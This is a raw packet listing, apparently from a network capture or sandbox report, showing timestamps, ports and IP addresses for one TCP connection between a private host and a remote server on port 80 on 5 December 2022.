Dec 5, 2022 01:32:56.999063969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999074936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999080896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999098063 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999100924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999114990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999136925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999149084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999608994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999627113 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999680042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999686956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999700069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999717951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999733925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999741077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999768972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999769926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999795914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999804020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999823093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999834061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999840975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999850035 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999871969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999881029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010308981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010404110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010445118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010484934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010524988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010541916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010541916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010565042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010588884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010588884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010608912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010622025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010648966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010664940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010694981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010701895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010735989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010742903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010781050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010787964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010823011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010831118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010864019 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010873079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010911942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.010929108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010970116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.010991096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011010885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011018038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011051893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011065960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011094093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011101007 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011137009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011142969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011177063 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011185884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011218071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011225939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011260033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011266947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011301041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011323929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011342049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011346102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011382103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011415005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011424065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011464119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011465073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011466980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011507034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011545897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011549950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011585951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011603117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011626005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011642933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011667013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011693001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011714935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011732101 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011756897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011769056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011804104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011841059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011864901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.011940002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011980057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.011993885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012021065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012032032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012062073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012073040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012100935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012115002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012141943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012160063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012181997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012197971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012223005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012237072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012267113 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012305975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012320042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012320995 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012347937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012387991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012396097 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012428045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012449026 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012468100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012474060 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012507915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012510061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012548923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012553930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012594938 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012595892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012634039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012646914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012675047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012685061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012715101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012725115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012754917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012764931 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012801886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012811899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012842894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012854099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012885094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012927055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012928963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012947083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.012965918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.012973070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013006926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013011932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013047934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013053894 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013087988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013094902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013132095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013171911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013190031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013212919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013221979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013256073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013266087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013297081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013308048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013338089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013348103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013379097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013386965 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013417959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013427019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013458967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013469934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013499022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013508081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013540983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013549089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013581991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013595104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013623953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013632059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013664007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013672113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013705015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013715982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013746023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013758898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013789892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013794899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013829947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013840914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013870955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013880014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013912916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013921022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013952971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.013964891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.013993979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014002085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014034986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014045000 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014075041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014091015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014115095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014126062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014157057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014167070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014198065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014213085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014240980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014251947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014281988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014291048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014322996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014331102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014364958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.014374971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.014417887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.015779972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015820026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015856981 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.015858889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015878916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.015898943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015918016 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.015939951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015957117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.015980959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.015990973 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016022921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016030073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016062975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016076088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016103983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016113997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016144037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016154051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016184092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016195059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016223907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016233921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016264915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.016274929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.016315937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.026757002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.029658079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049504995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049560070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049588919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049602985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049626112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049644947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049679041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049686909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049693108 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049726963 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049729109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049767971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049768925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049814939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049817085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049854994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049864054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049896955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049901009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049938917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049947023 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.049979925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.049985886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050020933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050028086 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050061941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050070047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050102949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050107956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050144911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050147057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050184965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050188065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050225973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050226927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050267935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050268888 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050308943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050311089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050348997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050360918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050390005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050395012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050431013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050440073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050473928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050483942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050514936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050554037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050568104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050594091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050605059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050635099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050667048 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050684929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050712109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050734997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050753117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050796986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050837040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050914049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050950050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050950050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050950050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050950050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.050977945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.050992966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051023006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051034927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051064014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051086903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051105022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051115990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051146030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051184893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051197052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051225901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051256895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051266909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051270008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051307917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051337004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051348925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051348925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051390886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051394939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051431894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051436901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051472902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051482916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051515102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051533937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051556110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051595926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051620007 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051636934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051651955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.051677942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051723003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.051780939 CET	49707	80	192.168.2.3	77.73.133.23
